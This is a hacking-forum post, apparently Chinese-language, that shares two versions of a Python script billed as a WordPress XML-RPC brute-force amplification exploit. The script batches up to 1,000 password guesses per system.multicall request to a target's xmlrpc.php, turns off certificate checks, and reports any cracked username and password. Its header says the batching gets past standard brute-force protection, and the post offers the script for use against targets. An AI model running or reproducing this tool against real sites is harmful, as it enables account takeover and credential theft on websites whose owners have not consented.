Jump to content
This Wind

Wordpress-XMLRPC-Brute-Force-Exploit 0day Bug

Recommended Posts

 

关于:

这是对Wordpress xmlrpc.php系统多重调用功能的一种利用,影响了最新版本的Wordpress(3.5.1)。该漏洞利用通过向xmlrpc.php发送每个请求1,000次以上的auth尝试来工作,以“强行”使用有效的Wordpress用户,并将遍历整个单词列表,直到获得有效的用户响应为止。然后,它将有选择地获取并显示有效的用户名和密码以进行登录。

用法:

./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username1 [username2] [username3]...

执照:

该软件可以免费分发,修改和使用,前提是要向创建者提供信用(1N3 @ CrowdShield),并且不得将其用于商业用途。

 

 

#!/usr/bin/python
# Wordpress XML-RPC Brute Force Amplification Exploit by 1N3
# Last Updated: 20160617
# https://crowdshield.com
#
# ABOUT: This exploit launches a brute force amplification attack on target Wordpress sites. Since XMLRPC allows multiple auth calls per request, amplification is possible and standard brute force protection will not block the attack.
#
# USAGE: ./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username
#


import urllib, urllib2, sys, getopt, requests, ssl
from array import *

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

def main(argv):
	argc = len(argv)

	if argc < 3:

		print bcolors.OKBLUE + " __      __                        .___                                             " + bcolors.ENDC
		print bcolors.OKBLUE + "/  \    /  \   ____   _______    __| _/ ______   _______    ____     ______   ______" + bcolors.ENDC
		print bcolors.OKBLUE + "\   \/\/   /  /  _ \  \_  __ \  / __ |  \____ \  \_  __ \ _/ __ \   /  ___/  /  ___/" + bcolors.ENDC
		print bcolors.OKBLUE + " \        /  (  <_> )  |  | \/ / /_/ |  |  |_> >  |  | \/ \  ___/   \___ \   \___ \ " + bcolors.ENDC
		print bcolors.OKBLUE + "  \__/\  /    \____/   |__|    \____ |  |   __/   |__|     \___  > /____  > /____  >" + bcolors.ENDC
		print bcolors.OKBLUE + "       \/                           \/  |__|                   \/       \/       \/ " + bcolors.ENDC
		print bcolors.OKBLUE + "" + bcolors.ENDC
		print bcolors.OKBLUE + "		\ /       _  _  __    _  _    ___ __    __ _  _  __ __" + bcolors.ENDC
		print bcolors.OKBLUE + "		 X |V||  |_)|_)/     |_)|_)| | | |_    |_ / \|_)/  |_ " + bcolors.ENDC
		print bcolors.OKBLUE + '		/ \| ||__| \|  \__   |_)| \|_| | |__   |  \_/| \\\__|__' + bcolors.ENDC
		print bcolors.OKBLUE + "" + bcolors.ENDC
		print ""
		print bcolors.OKBLUE + "+ -- --=[XML-RPC Brute Force Exploit by 1N3 @ https://crowdshield.com" + bcolors.ENDC
        	print bcolors.OKBLUE + "+ -- --=[Usage: %s http://wordpress.org/xmlrpc.php passwords.txt username" % (argv[0]) + bcolors.ENDC
        	sys.exit(0)

	url = argv[1] # SET TARGET
	wordlist = argv[2] # SET CUSTOM WORDLIST
	users = argv[3] # SET USERNAME TO BRUTE FORCE
	# users = ['flipkey'] # USERS LIST, ADD MORE AS NEEDED OR CHANGE DEFAULT ADMIN
	
	print bcolors.OKBLUE + "" + bcolors.ENDC
	print bcolors.OKBLUE + " __      __                        .___                                             " + bcolors.ENDC
	print bcolors.OKBLUE + "/  \    /  \   ____   _______    __| _/ ______   _______    ____     ______   ______" + bcolors.ENDC
	print bcolors.OKBLUE + "\   \/\/   /  /  _ \  \_  __ \  / __ |  \____ \  \_  __ \ _/ __ \   /  ___/  /  ___/" + bcolors.ENDC
	print bcolors.OKBLUE + " \        /  (  <_> )  |  | \/ / /_/ |  |  |_> >  |  | \/ \  ___/   \___ \   \___ \ " + bcolors.ENDC
	print bcolors.OKBLUE + "  \__/\  /    \____/   |__|    \____ |  |   __/   |__|     \___  > /____  > /____  >" + bcolors.ENDC
	print bcolors.OKBLUE + "       \/                           \/  |__|                   \/       \/       \/ " + bcolors.ENDC
	print bcolors.OKBLUE + "" + bcolors.ENDC
	print bcolors.OKBLUE + "		\ /       _  _  __    _  _    ___ __    __ _  _  __ __" + bcolors.ENDC
	print bcolors.OKBLUE + "		 X |V||  |_)|_)/     |_)|_)| | | |_    |_ / \|_)/  |_ " + bcolors.ENDC
	print bcolors.OKBLUE + '		/ \| ||__| \|  \__   |_)| \|_| | |__   |  \_/| \\\__|__' + bcolors.ENDC
	print bcolors.OKBLUE + "" + bcolors.ENDC
	print ""
	print bcolors.OKBLUE + "+ -- --=[XML-RPC Brute Force Exploit by 1N3 @ https://crowdshield.com" + bcolors.ENDC
	print bcolors.WARNING + "+ -- --=[Brute forcing target: " + url + " with username: " + users + "" + bcolors.ENDC

	data1 = '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data>'
	data2 = ""
	data3 = '</data></array></value></param></params></methodCall>'

	num_lines = sum(1 for line in open(wordlist))
	f = open(wordlist)
	lines = f.readlines()
	passwds = f.read().splitlines()
	f.close()

	num = 0 # CURRENT LINE POSITION
	count = 0 # HOW MANY AUTHS TO SEND PER REQUEST

	while num < num_lines:
		# SEND 50 AUTH REQUESTS PER REQUEST
		if count < 1000:
			num += 1
			count += 1

			# REACHED END OF FILE, SEND REQUEST AND ATTEMPT BRUTE FORCE...
			if num >= num_lines:
				data = "" + data1 + "" + data2 + "" + data3
				header = 'headers={"Content-Type": "application/xml"}'
				req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
				rsp = urllib2.urlopen(req,context=ctx)
				content = rsp.read()
				print content

				if "admin" in content.lower():
					print bcolors.OKGREEN + "+ -- --=[Brute Force Amplification Attack Successful!" + bcolors.ENDC
					print bcolors.WARNING + "+ -- --=[Starting Brute Force Enumeration..." + bcolors.ENDC

					for user in users:
						while num <= num_lines:
							num -= 1
							passwd = str(lines[num])
							data = '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>' + user + '</value></param><param><value>' + passwd + '</value></param></params></methodCall>'
							header = 'headers={"Content-Type": "application/xml"}'
							req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
							rsp = urllib2.urlopen(req,context=ctx)
							content = rsp.read()
							print content

							if "incorrect" in content.lower():
								print bcolors.FAIL + "+ -- --=[Wrong username or password: " + user + "/" + passwd + "" + bcolors.ENDC
							elif "admin" in content.lower():
								print bcolors.OKGREEN + "+ -- --=[w00t! User found! Wordpress is pwned! " + user + "/" + passwd + "" + bcolors.ENDC
								sys.exit(0)
							else:
								print bcolors.WARNING + "+ -- --=[Invalid response from target" + bcolors.ENDC
								sys.exit(0)
				else:
					print bcolors.FAIL + "+ -- --=[Brute force failed" + bcolors.ENDC

				break
				sys.exit(0)
			else:
				passwd = str(lines[num])
				for user in users:
					data2 += str('<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>'+user+'</string></value><value><string>'+passwd+'</string></value></data></array></value></data></array></value></member></struct></value>')
		
		# WE'VE REACHED THE LIMIT, SEND THE REQUEST AND RESET COUNTER
		else:
			count = 0
			data = "" + data1 + "" + data2 + "" + data3
			header = 'headers={"Content-Type": "application/xml"}'
			req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
			rsp = urllib2.urlopen(req,context=ctx)
			content = rsp.read()
			print content
			data2 = ""

			if "admin" in content.lower():
				print bcolors.OKGREEN + "+ -- --=[Brute Force Amplification Attack Successful!" + bcolors.ENDC
				print bcolors.WARNING + "+ -- --=[Starting Brute Force Enumeration..." + bcolors.ENDC

				for user in users:
					while num <= num_lines:
						passwd = str(lines[num])
						data = '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>' + user + '</value></param><param><value>' + passwd + '</value></param></params></methodCall>'
						header = 'headers={"Content-Type": "application/xml"}'
						req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
						rsp = urllib2.urlopen(req,context=ctx)
						content = rsp.read()
						num -= 1
						print content

						if "incorrect" in content.lower():
							print bcolors.FAIL + "+ -- --=[Wrong username or password: " + user + "/" + passwd + "" + bcolors.ENDC
						elif "admin" in content.lower():
							print bcolors.OKGREEN + "+ -- --=[w00t! User found! Wordpress is pwned! " + user + "/" + passwd + "" + bcolors.ENDC
							sys.exit(0)
						else:
							print bcolors.WARNING + "+ -- --=[Invalid response from target" + bcolors.ENDC
							sys.exit(0)
			else:
				print bcolors.FAIL + "+ -- --=[Brute force failed" + bcolors.ENDC

main(sys.argv)

 

 

#!/usr/bin/python
# Wordpress XML-RPC Brute Force Amplification Exploit by 1N3
# Last Updated: 20170215
# https://crowdshield.com
#
# ABOUT: This exploit launches a brute force amplification attack on target 
# Wordpress sites. Since XMLRPC allows multiple auth calls per request, 
# amplification is possible and standard brute force protection will not block 
# the attack.
#
# USAGE: ./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username [username2] [username3]...
#

import time, urllib, urllib2, sys, requests, ssl
from array import *

WAIT_TIME = 5
PASSWD_PER_REQUEST = 1000

class bcolors:
    HEADER    = '\033[95m'
    OKBLUE    = '\033[94m'
    OKGREEN   = '\033[92m'
    WARNING   = '\033[93m'
    FAIL      = '\033[91m'
    ENDC      = '\033[0m'
    BOLD      = '\033[1m'
    UNDERLINE = '\033[4m'

def banner(argv, usage = False, url = None, users = None):
    print bcolors.OKBLUE + " __      __                        .___                                             " + bcolors.ENDC
    print bcolors.OKBLUE + "/  \    /  \   ____   _______    __| _/ ______   _______    ____     ______   ______" + bcolors.ENDC
    print bcolors.OKBLUE + "\   \/\/   /  /  _ \  \_  __ \  / __ |  \____ \  \_  __ \ _/ __ \   /  ___/  /  ___/" + bcolors.ENDC
    print bcolors.OKBLUE + " \        /  (  <_> )  |  | \/ / /_/ |  |  |_> >  |  | \/ \  ___/   \___ \   \___ \ " + bcolors.ENDC
    print bcolors.OKBLUE + "  \__/\  /    \____/   |__|    \____ |  |   __/   |__|     \___  > /____  > /____  >" + bcolors.ENDC
    print bcolors.OKBLUE + "       \/                           \/  |__|                   \/       \/       \/ " + bcolors.ENDC
    print bcolors.OKBLUE + "" + bcolors.ENDC
    print bcolors.OKBLUE + "        \ /       _  _  __    _  _    ___ __    __ _  _  __ __" + bcolors.ENDC
    print bcolors.OKBLUE + "         X |V||  |_)|_)/     |_)|_)| | | |_    |_ / \|_)/  |_ " + bcolors.ENDC
    print bcolors.OKBLUE + '        / \| ||__| \|  \__   |_)| \|_| | |__   |  \_/| \\\__|__' + bcolors.ENDC
    print bcolors.OKBLUE + "" + bcolors.ENDC
    print ""
    print bcolors.OKBLUE + "+ -- --=[XML-RPC Brute Force Exploit by 1N3 @ https://crowdshield.com" + bcolors.ENDC
    if usage:
        print bcolors.OKBLUE + "+ -- --=[Usage: %s http://wordpress.org/xmlrpc.php passwords.txt username [username]..." % (argv[0]) + bcolors.ENDC
        sys.exit(0)
    else:
        print bcolors.WARNING + "+ -- --=[Brute forcing target: " + url + " with usernames: " + str(users) + "" + bcolors.ENDC

def send_request(url, data):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    header = 'headers={"Content-Type": "application/xml"}'
    req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
    rsp = urllib2.urlopen(req,context=ctx)
    return rsp.read()

def check_response(content, user, passwd):
    if "incorrect" in content.lower():
        print bcolors.FAIL + "+ -- --=[Wrong username or password: " + user + "/" + passwd + "" + bcolors.ENDC
    elif "admin" in content.lower():
        print bcolors.OKGREEN + "+ -- --=[w00t! User found! Wordpress is pwned! " + user + "/" + passwd + "" + bcolors.ENDC
        sys.exit(0)
    else:
        print bcolors.WARNING + "+ -- --=[Invalid response from target" + bcolors.ENDC
        sys.exit(0)

def template(entries):
    t  = '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data>'
    for entry in entries:
        t += "<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>%s</string></value><value><string>%s</string></value></data></array></value></data></array></value></member></struct></value>" % (entry.get('user'), entry.get('passwd'))
    t += '</data></array></value></param></params></methodCall>'
    return t

def attack(entries):
    if len(entries) < 1: return
    t = template(entries)
    return send_request(url, t)

def find_one(entries):
    for entry in entries:
        t = template([entry])
        content = send_request(url, t)
        check_response(content, entry.get('user'), entry.get('passwd'))

if __name__ == '__main__':
    if len(sys.argv) < 3: banner(sys.argv, True)

    url      = sys.argv[1]     # SET TARGET
    wordlist = sys.argv[2]     # SET CUSTOM WORDLIST
    users    = sys.argv[3:]    # SET USERNAME TO BRUTE FORCE

    banner(sys.argv, False, url, users) 

    with open(wordlist, 'r') as f:
        passwds = f.read().splitlines()

    entries = []
    for user in users:
        print "user: %s" % user
        for num in range(0, len(passwds)):
            if (len(entries) == PASSWD_PER_REQUEST):
                if "admin" in attack(entries):
                    find_one(entries)
                entries = []
                time.sleep(WAIT_TIME)
            entries.append({"user": user, "passwd": passwds[num]})
        if "admin" in attack(entries):
            find_one(entries)
        entries = []

 

Link to post
Share on other sites

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines